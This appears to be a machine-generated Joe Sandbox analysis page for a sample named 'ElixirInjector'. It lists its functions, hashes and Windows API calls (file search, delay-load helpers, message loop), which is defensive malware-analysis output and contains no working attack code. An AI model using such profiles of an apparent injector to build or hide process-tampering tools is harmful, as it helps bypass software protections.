Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4e1fa7361770899b9ab791d7fcbccd58ff26e788be2ea87b4ac682020cf23009
Instruction ID: b9255f164cc252c877f5bfed3472097a11ad8035cb10067e2b5c337eabd8f413
Opcode Fuzzy Hash: 4e1fa7361770899b9ab791d7fcbccd58ff26e788be2ea87b4ac682020cf23009
Instruction Fuzzy Hash: 71E06D32A0632A57EA7136A59C05B9B7A489B427F4F150121BC58A7091CFACCE82B2E1

Function 00F15ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F15AC2

Part of subcall function 00F1B505: __EH_prolog.LIBCMT ref: 00F1B50A

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 11baf58a690af0d25166fd5f7a4bfeac645692c107f6079d93300c58accbe249
Instruction ID: b9a4f40574898bdc97a4f4f9fabc7d0fd1faca968eff9edc61554229a5918e4e
Opcode Fuzzy Hash: 11baf58a690af0d25166fd5f7a4bfeac645692c107f6079d93300c58accbe249
Instruction Fuzzy Hash: 7C018C318106A0DAD725EBB8E8417EDFBA49F64704F54848DA45653283CFBC1B08E7A2

Function 00F1A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00F1A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00F1A592,000000FF,?,?), ref: 00F1A6C4
Part of subcall function 00F1A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00F1A592,000000FF,?,?), ref: 00F1A6F2
Part of subcall function 00F1A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00F1A592,000000FF,?,?), ref: 00F1A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00F1A598

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 50d7bb9d49d0635b50cf864efd46425d416649b481e3638bf820bbf11795c25a
Instruction ID: b6a1398f55e518d110e68a4d0ea425aa4afd2f03571bfb3a9b7ac7ee014e521b
Opcode Fuzzy Hash: 50d7bb9d49d0635b50cf864efd46425d416649b481e3638bf820bbf11795c25a
Instruction Fuzzy Hash: E3F0823640E790AACB2257B48D04BCB7B956F1A331F088A49F5FD5219AC27950D8BB23

Function 00F20E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00F20E3D

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: c5645229537ede72dccb6d1540b009d5bbeb3f9a91a86ce054a3b5be6beffcf5
Instruction ID: b31b1e7cf337673d8713010b0605e17f769bf492e60dfd17b3290911e0d2c821
Opcode Fuzzy Hash: c5645229537ede72dccb6d1540b009d5bbeb3f9a91a86ce054a3b5be6beffcf5
Instruction Fuzzy Hash: 6DD01212A011696ADA1133287C55BFE35269FD7323F0D0065F545971C3CE5D48C6B2A1

Function 00F2A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00F2A62C

Part of subcall function 00F2A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F2A3DA

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: d977afde5e843b9935026b2e8e8bd8604bf8a00b084a75be5e89fef0438363f5
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: A1D0A931600218BBDF02AB21EC12A7E7AA9EB00340F008021B882C5181EBB2DD10B262

Function 00F2E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00F2E5E3

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 3ab5ec0537f023e26b31ffcdc41d873f13cb8626a0dee754902ad5ef2a5cc3a3
Instruction ID: 684d64fbfa0577b504801e29cdb8c07f8645aebe5edadad7808f909fb0eed2a4
Opcode Fuzzy Hash: 3ab5ec0537f023e26b31ffcdc41d873f13cb8626a0dee754902ad5ef2a5cc3a3
Instruction Fuzzy Hash: E0D0C9B45A02A49BD602EBECBE477963754B725B14FB80101B189E1495DB7C8488BA17

Function 00F2DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00F21B3E), ref: 00F2DD92

Part of subcall function 00F2B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F2B579
Part of subcall function 00F2B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F2B58A
Part of subcall function 00F2B568: IsDialogMessageW.USER32(000103D8,?), ref: 00F2B59E
Part of subcall function 00F2B568: TranslateMessage.USER32(?), ref: 00F2B5AC
Part of subcall function 00F2B568: DispatchMessageW.USER32(?), ref: 00F2B5B6

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 387e0167b634c3f87aed8955658acf49902090229c9a07156b049e0da89f9822
Instruction ID: 2605d254978384f555c3c65cd1bfb9e5a97a28070a74f9db1e5c33dfd2b1cf2c
Opcode Fuzzy Hash: 387e0167b634c3f87aed8955658acf49902090229c9a07156b049e0da89f9822
Instruction Fuzzy Hash: FCD09E32144310FAD6016B51DD07F0A7BA2AB88B05F404555B784740F18A76AD61FF12

Function 00F198BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00F197BE), ref: 00F198C8

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 3464562bf40e6273ac395cbd0fb2172d91c36c3167b93c77ac1a88d2cfb029b3
Instruction ID: 88357390d38cf92d4cfd6c5f9b5eda5f7ad1ae1115a893827ec66a00cddcc33c
Opcode Fuzzy Hash: 3464562bf40e6273ac395cbd0fb2172d91c36c3167b93c77ac1a88d2cfb029b3
Instruction Fuzzy Hash: 31C00238808209968E219A2898690D97762AB633BA7F49794D06D890A1C362CCDBFA51

Function 00F2E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 326ec70261e5219fe799cb01e1a1f20bc585350771bbc6b3534a6b2b52279cfe
Instruction ID: 8e68bbf81642bffee1ad7bb631b87d22d78bf5fe6aa0dcaae8d17c40946e1577
Opcode Fuzzy Hash: 326ec70261e5219fe799cb01e1a1f20bc585350771bbc6b3534a6b2b52279cfe
Instruction Fuzzy Hash: A0B012D2259010BC314453453D02D3B021CC2C2B11330C03FFC49C0181E880EC043473

Function 00F2E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a0eb6d50151090794785c64443047d4f7d6d9d65b7b9782cbd722131c7fc4ca5
Instruction ID: 08c960312ad3e38727b2035a2276a5d5aa0c1ec678ad2eb9cc57aed65a1e6c72
Opcode Fuzzy Hash: a0eb6d50151090794785c64443047d4f7d6d9d65b7b9782cbd722131c7fc4ca5
Instruction Fuzzy Hash: BEB012D625D120FC314452893D02D3B031DC2C1B11330803FFC09C0081EC80AC003573

Function 00F2E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2413193644c51c7d68bea047f3c6088f5c147bccc70ce864f2f6654deb3fed3d
Instruction ID: 59131fef6bfde05c61ab74f2f0d1d5c5dcbed64563a91970e69e5cbcc87c723c
Opcode Fuzzy Hash: 2413193644c51c7d68bea047f3c6088f5c147bccc70ce864f2f6654deb3fed3d
Instruction Fuzzy Hash: 5BB012D6259120FC310412853D12C3B021DC2C2B11330C43FFC45C0481EC80EC003473

Function 00F2EAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2EAF9

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 440caefb3178159dcbbfe059bccdd611e880eb6a712805271065417d4250bfe3
Instruction ID: 8dbe3d42b83b01024e2c3e44942dbc273567e65b6e0732cd31c65038562f433a
Opcode Fuzzy Hash: 440caefb3178159dcbbfe059bccdd611e880eb6a712805271065417d4250bfe3
Instruction Fuzzy Hash: 3AB012C729B0727C310462003D02C77010CC0C1B90331D02FF908C4082EC854C013873

Function 00F2E2B4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c19fa07a91ee72d93ce2cf281915150e26cb4cfa0a28ed75c84497f565f1d0a7
Instruction ID: 2c915ba1de94cb914dcd71a6a79ec51aba43740accb6c1d781285a672153d64e
Opcode Fuzzy Hash: c19fa07a91ee72d93ce2cf281915150e26cb4cfa0a28ed75c84497f565f1d0a7
Instruction Fuzzy Hash: 48B012D2659010BC314452453D03D7B031CC2C1B11330843FFC09C00C1E880AC003473

Function 00F2E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 759e1666234b18cd424cd1dce0c71b9122d453761b9abf9b9421b650b46c23c3
Instruction ID: 159c3d9206be1dc155b3a22832aa37a342c3f584f7b9778d7bc01cff77d70f96
Opcode Fuzzy Hash: 759e1666234b18cd424cd1dce0c71b9122d453761b9abf9b9421b650b46c23c3
Instruction Fuzzy Hash: F4B012E2359020BC314452453E02D3B029CC2C1B11330803FFC09C0081EC80AD013473

Function 00F2E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f695f7b8bd69f21a3a7fc7ef9d6aa25b2284c8b8a2ce61d58b05df72c025d58d
Instruction ID: 39c28c25f550508df4275737778f54f0422a1e919053364d027192ce9478e028
Opcode Fuzzy Hash: f695f7b8bd69f21a3a7fc7ef9d6aa25b2284c8b8a2ce61d58b05df72c025d58d
Instruction Fuzzy Hash: 7DB012D226A050BC314452453D02D3B035DC6C1B11330803FFC0AC0081E890AC003473

Function 00F2E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 79099313e05fa00f74bfe180effdfb89ac85b07027fd4760c6b96f59f53e35dc
Instruction ID: 0a2b2ef302af955ea0deee9e7f74912130622a26280aa01b64640e7d74d911da
Opcode Fuzzy Hash: 79099313e05fa00f74bfe180effdfb89ac85b07027fd4760c6b96f59f53e35dc
Instruction Fuzzy Hash: D1B012D2359010BC314452553D02D3B025CC2C2B11330C03FFC49C0081E880EC003473

Function 00F2E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 82517addf69ad692815c49fca4db098688498e5597eed95f6c378a2a4f1fcc86
Instruction ID: 1448b0b419d43ed4963a6ba4b1e559dbda577d35b1da15feaee45f345136a1b0
Opcode Fuzzy Hash: 82517addf69ad692815c49fca4db098688498e5597eed95f6c378a2a4f1fcc86
Instruction Fuzzy Hash: D7B012E225A150BC318453453D02D3B021DC2C1B11330813FFC09C0481E890AC443473

Function 00F2E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

